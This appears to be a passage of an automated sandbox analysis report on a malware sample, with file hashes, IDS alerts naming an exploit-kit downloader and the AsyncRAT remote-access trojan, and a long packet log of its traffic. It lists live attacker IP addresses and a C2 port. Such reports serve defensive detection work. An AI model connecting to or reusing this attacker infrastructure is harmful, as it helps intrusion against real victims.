                                            SHA1:6b651ed9e576d72b6c53e975e555572701fe2681
                                            SHA256:5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812
                                            SHA512:ac0b98a599ae60043b4d652d7f2826f26918ae6eb2f99f2dec7c14b34d74bea25264da0962eef619e1c72f67d181c4a1c1d52a71a5d7e734869a18300805cc11
                                            SSDEEP:3072:BiiiiiiiiiiiiiiiiiiiiUiiiiiiiiiiiiiiiiiiiihiiiiiiiiiiiiiiiiiiiij:8
                                            TLSH:B995F0A2314F7DB29346EE29E4718228461B57470B63F50D8C29D6E385702B3DACBED7
                                            File Content Preview:......'.Z.].X...d.>.n...;.d.I...l.&.a.i.+.7.+.W...3.b...W...I...l./._...Q.6.6._...l.6.L.H.l.<. .#.G.[.(.o...W._.\.U.d.m.P.X.+.V.;.V.R.m.>.E...&.:...8.).U..._.b.6...........7...a.g...........K.S.....R.f.5...W.o.e.-.;...o.S.a...d._.H.l...R.o.....K...-.Y...K

                                            File Icon

                                            Icon Hash:68d69b8f86ab9a86

                                            Network Behavior

                                            Suricata IDS Alerts

                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                            2024-10-01T06:29:58.030429+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973091.202.233.16980TCP
                                            2024-10-01T06:29:58.378098+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973091.202.233.16980TCP
                                            2024-10-01T06:29:58.380252+02002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1191.202.233.16980192.168.2.449730TCP
                                            2024-10-01T06:30:19.591904+02002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)189.117.23.224455192.168.2.449737TCP
                                            2024-10-01T06:30:19.591904+02002034847ET MALWARE Observed Malicious SSL Cert (AsyncRAT)189.117.23.224455192.168.2.449737TCP
                                            2024-10-01T06:30:19.591904+02002848048ETPRO MALWARE Observed Malicious SSL Cert (AsyncRAT)189.117.23.224455192.168.2.449737TCP

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 1, 2024 06:29:57.020984888 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.026159048 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.026267052 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.026890039 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.031725883 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.720839977 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.720897913 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.720928907 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.720961094 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.720988989 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.720993996 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.721028090 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.721049070 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.721061945 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.721084118 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.721093893 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.721126080 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.721137047 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.721159935 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.721200943 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.726119041 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:57.770286083 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.808377028 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:57.813178062 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030160904 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030205011 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030261993 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030428886 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.030477047 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030509949 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030544043 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030544996 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.030571938 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030599117 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.030854940 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030881882 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030908108 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.030972004 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.030998945 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.031019926 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.031214952 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.031246901 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.031264067 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.031280041 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.031311989 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.031327009 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.031802893 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.031855106 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.031932116 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.031965017 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.032011986 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.032300949 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.032331944 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.032365084 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.032376051 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.035586119 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.035634995 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.035645008 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.035672903 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.035706997 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.035720110 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.035743952 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.035790920 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.153285980 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153366089 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153400898 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153446913 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153484106 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153546095 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.153546095 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.153572083 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153606892 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153630972 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.153640032 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153673887 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153692007 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.153713942 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153747082 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.153770924 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154123068 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154153109 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154180050 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154206991 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154241085 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154262066 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154272079 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154305935 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154328108 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154341936 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154392958 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154606104 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154638052 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154671907 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154691935 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154704094 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154736996 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154759884 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154853106 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.154913902 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.154999018 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.155031919 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.155080080 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.155092001 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.155128956 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.155163050 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.155184031 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.156641006 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.161591053 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.377931118 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.377969027 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378001928 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378052950 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378084898 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378098011 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378119946 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378139973 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378155947 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378181934 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378190994 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378226042 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378259897 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378274918 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378321886 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378361940 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378416061 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378469944 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378474951 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378520012 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378554106 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378573895 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378586054 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378638029 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378874063 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378925085 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378961086 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.378978968 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.378993988 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379026890 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379048109 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.379060030 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379115105 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.379323959 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379374027 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379422903 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379440069 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.379456997 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379488945 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379506111 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.379522085 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379554033 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379585028 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.379589081 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379664898 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.379879951 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379934072 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.379975080 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.379982948 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380033016 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380064964 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380079985 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.380098104 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380131006 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380143881 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.380165100 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380196095 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380213022 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.380251884 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380285978 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380296946 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.380820990 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380856037 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380865097 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.380888939 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380934954 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.380939960 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.380973101 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381022930 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381028891 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.381056070 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381088972 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381100893 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.381122112 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381155968 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381165981 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.381191015 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381234884 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.381798983 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381850958 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381886005 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381899118 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.381920099 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381954908 CEST804973091.202.233.169192.168.2.4
                                            Oct 1, 2024 06:29:58.381966114 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.426542997 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:29:58.484679937 CEST4973080192.168.2.491.202.233.169
                                            Oct 1, 2024 06:30:18.973164082 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:18.978060961 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:18.978147030 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:18.988738060 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:18.993608952 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.580396891 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.586956024 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:19.591903925 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.765727043 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:19.817204952 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:20.027303934 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:20.032136917 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:20.032202005 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:20.036998034 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:30.252516985 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:30.301619053 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:30.387494087 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:30.442240000 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.005526066 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.010627031 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.010696888 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.015693903 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.296649933 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.348483086 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.434318066 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.436242104 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.441204071 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:31.441277981 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:31.446212053 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:41.990216970 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:41.995178938 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:41.995242119 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.000832081 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.281076908 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.332992077 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.416698933 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.418085098 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.422960043 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:42.423017025 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:42.427918911 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:52.973963022 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:52.978959084 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:52.979027033 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:52.983863115 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.264847994 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.317286968 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:53.396378994 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.398396969 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:53.403215885 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:30:53.405535936 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:30:53.410381079 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:00.568073034 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:00.614227057 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:00.700404882 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:00.754822969 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:03.959043980 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:03.964155912 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:03.964222908 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:03.969046116 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.249217987 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.301904917 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:04.372582912 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.374329090 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:04.379101992 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:04.379163980 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:04.383941889 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:14.942842960 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:14.948735952 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:14.948828936 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:14.954965115 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.233608961 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.286077023 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:15.364383936 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.376868010 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:15.381768942 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:15.381834984 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:15.386687040 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:25.927169085 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:25.932101011 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:25.932195902 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:25.936961889 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.217648983 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.270468950 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:26.348408937 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.349807978 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:26.354722023 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:26.354774952 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:26.359561920 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:30.251924992 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:30.312122107 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:30.380372047 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:30.426934958 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:36.911545038 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:36.916580915 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:36.916661024 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:36.921521902 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.371934891 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.371994019 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.372060061 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:37.373780966 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:37.378608942 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:37.378667116 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:37.383486986 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:47.895967007 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:47.900800943 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:47.900854111 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:47.906090021 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.404901028 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.458043098 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:48.529556036 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.531080008 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:48.535800934 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:48.535859108 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:48.540693045 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:58.880368948 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:58.885283947 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:58.885371923 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:58.890121937 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.169656038 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.223838091 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:59.300406933 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.302383900 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:59.307199001 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:31:59.307259083 CEST497374455192.168.2.489.117.23.22
                                            Oct 1, 2024 06:31:59.312202930 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:00.251276016 CEST44554973789.117.23.22192.168.2.4
                                            Oct 1, 2024 06:32:00.302000999 CEST497374455192.168.2.489.117.23.22
